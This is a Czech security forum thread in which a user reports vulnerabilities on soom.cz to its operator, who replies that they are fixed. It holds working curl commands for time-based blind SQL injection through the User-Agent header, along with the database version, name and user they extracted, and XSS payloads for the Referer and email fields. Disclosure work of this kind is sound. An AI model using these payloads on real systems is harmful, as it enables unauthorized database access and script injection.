SQL injection na soom.cz
BugTrack

SQL injection na soom.cz | # |
| SQL injection v projektu GET2MAIL
Jedna se o boolean time based blind, neni osetren user agent a seznam pristupu vraci true/false.
curl '[link] -H $'User-Agent: sql\' OR sleep(10) OR \'1\'=\'1'
version()
5.1.73-1%
curl '[link] -H $'User-Agent: sql\' or version() like \'5.1.73-1%\' AND \'1\'=\'1'
database()
soom_cz
curl '[link] -H $'User-Agent: sql\' or database()=\'soom_cz\' AND \'1\'=\'1'
user()
soom_cz_localhost%
curl '[link] -H $'User-Agent: sql\' or user() like \'soom_cz_localhost%\' AND \'1\'=\'1'
Zaroven je v seznamu pristupu stored XSS v poli referer:
curl '[link] --referer 'javascript:alert(1)'
Jeste by bylo fajn opravit regex pro overovani emailu v uzivatelskem profilu. Je mozne ulozit nasledujici email:
xss"><img src=x onerror=alert(1)>xss@soom.cz
a vyvolat self XSS pri pridavani inzeratu v bazaru. (odpovědět) | Sinxteniyn | 192.42.116.* | 24.3.2017 14:36 |
|
|
|
re: SQL injection na soom.cz | # |
| Sinxteniyn: Díky! Snad je to již OK. Věřím ale, že ty určitě ještě něco najdeš :)
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
re: SQL injection na soom.cz | # |
| Neverim, ze tohle delal manualne ... to by tech requestu v curl vypalil peknou sadu, nez by tu "slepotu" nasel :D (odpovědět) | vspqq | 82.117.146.* | 27.4.2017 17:35 |
|
|
|